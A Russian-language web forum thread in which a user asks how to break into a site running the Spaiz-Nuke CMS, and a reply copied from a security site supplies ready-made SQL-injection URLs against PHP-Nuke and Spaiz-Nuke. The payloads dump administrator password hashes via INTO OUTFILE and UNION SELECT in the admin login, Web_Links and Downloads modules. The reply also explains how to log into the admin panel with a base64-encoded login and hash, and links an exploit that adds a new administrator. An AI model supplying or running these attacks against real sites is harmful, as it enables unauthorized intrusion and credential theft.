WmKing.ru

Здравствуйте, гость ( Вход | Регистрация )

 
Ответить в эту темуОткрыть новую тему
> Чем можно взломать сайт на двиге spaiz nuke
Александр
сообщение 25.4.2006, 7:43
Сообщение #1


Вникающий
**

Группа: Пользователи
Сообщений: 38
Регистрация: 24.4.2006
Пользователь №: 72


Заработано:0.391$
Выплачено:0$
Штрафы:0$
К выплате:0.391$


Пол: мужской



Репутация:   0  


Надо очень . Может кто нибудь знает ?
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
SLAM
сообщение 14.6.2006, 12:37
Сообщение #2


Вникающий
**

Группа: Пользователи
Сообщений: 38
Регистрация: 14.6.2006
Пользователь №: 157


Заработано:0.484$
Выплачено:0$
Штрафы:0$
К выплате:0.484$


Пол: мужской



Репутация:   0  


c секлаба:
1. sql-кода в модуле администрирования

Уязвимость обнаружена в сценарии auth.php в функции проверки логина и пароля. Атакующий может получить зашифрованный пароль администратора. Отсутствие проверки ввода обнаружено в переменной $aid содержащей логин для авторизации. Используя кавычку можно перенаправить вывод в произвольный файл на сервере. Эксплоит:
www.site.com/admin.php?op=login&pwd=123&aid=Admin'%20INTO%20OUTFILE%
20'/path_to_file/pwd.txt
(проверялось только на spaiz-nuke) После ввода данной строки в браузере на уязвимом сервере будет создан файл /path_to_file/pwd.txt содержащий зашифрованный пароль для логина "Admin".

Решение:

Включите magic_quotes_gpc в php.ini файле

2. Внедрение sql-кода в модуле web_links

Отсутствие проверки ввода обнаружено в переменной $cid в модуле web-links. Атакующий может внедрить произвольный sql-код.

Эксплоит:

Следующий эксплоит показывает пример получения логинов и зашифрованных паролей администраторов движка. Работает на БД поддерживающих команду UNION (mysql>4) Для других БД необходимо изменять вид sql-запроса.
Для php-nuke

Данная строка выдаст все логины:
www.site.com/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%
20counter,%20aid,%20pwd%20FROM%20nuke_authors%20--
Данная строка выдаст все зашифрованные пароли:
www.site.com/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%
20counter,%20pwd,%20aid%20FROM%20nuke_authors%20--
Для spaiz-nuke

Изменить nuke_authors в строке на spnuke_authors 3. Внедрение sql-кода в модуле download *

Эксплоит:
Для php-nuke
www.site.com/modules.php?name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%
20counter,%20aid,%20pwd%20FROM%20nuke_authors%20--
Для spaiz-nuke также как и в предыдущем случае.
4. Доступ без расшифровки пароля

Пароли данного движка шифруются с помощью алгоритма md5 однако атакующий может получить доступ даже не зная расшифрованного пароля.

Эксплоит:

Сначала следует зашифровать полученные логин и зашифрованный md5 пароль с помощью алгоритма base64.

Сделать это можно например здесь: http://www.isecurelabs.com/base64.php Шифруем этим алгоритмом следующую строку:
login:crypt_passwd:
где
login=логин
crypt_passwd=зашифрованный пароль.
Получаем хеш.

Например для admin:21232f297a57a5a743894a0e4a801fc3: хеш будет следующим:

YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYz
M6

Теперь можно получить доступ к панели администрирования используя следующий урл:
www.site.com/admin.php?admin=ваш_хэш
Вручную использование данной уязвимости немного неудобно поэтому был написан сплоит позволяющий добавить нового администратора со всеми правами. Посмотреть сплоит можно здесь: http://rst.void.ru/download/r57nuke.txt
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
john_bos
сообщение 25.2.2008, 17:53
Сообщение #3


Подрабатывающий
***

Группа: Пользователи
Сообщений: 92
Регистрация: 23.1.2008
Пользователь №: 3 691
На форуме:
0d 4h 16m 58s


Заработано:0.68$
Выплачено:0$
Штрафы:0.32$
К выплате:0.36$


Пол: мужской



Репутация:   -1  


спасиба ты мне очень помог
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
nikola172
сообщение 21.3.2008, 18:48
Сообщение #4


Знающий
****

Группа: Заблокированные
Сообщений: 337
Регистрация: 21.3.2008
Пользователь №: 4 204


Заработано:2.066$
Выплачено:0$
Штрафы:0.19$
К выплате:1.876$


Пол: мужской



Репутация:   -2  


подумаешь
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Рекламный бот
сообщение
Сообщение #














Рекламное место свободно!
По вопросам размещения свяжитесь с администрацией форума.
Вернуться в начало страницы
Ответить с цитированием данного сообщения

Ответить в эту темуОткрыть новую тему
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0

 



- Текстовая версия Сейчас: 2.5.2024, 11:19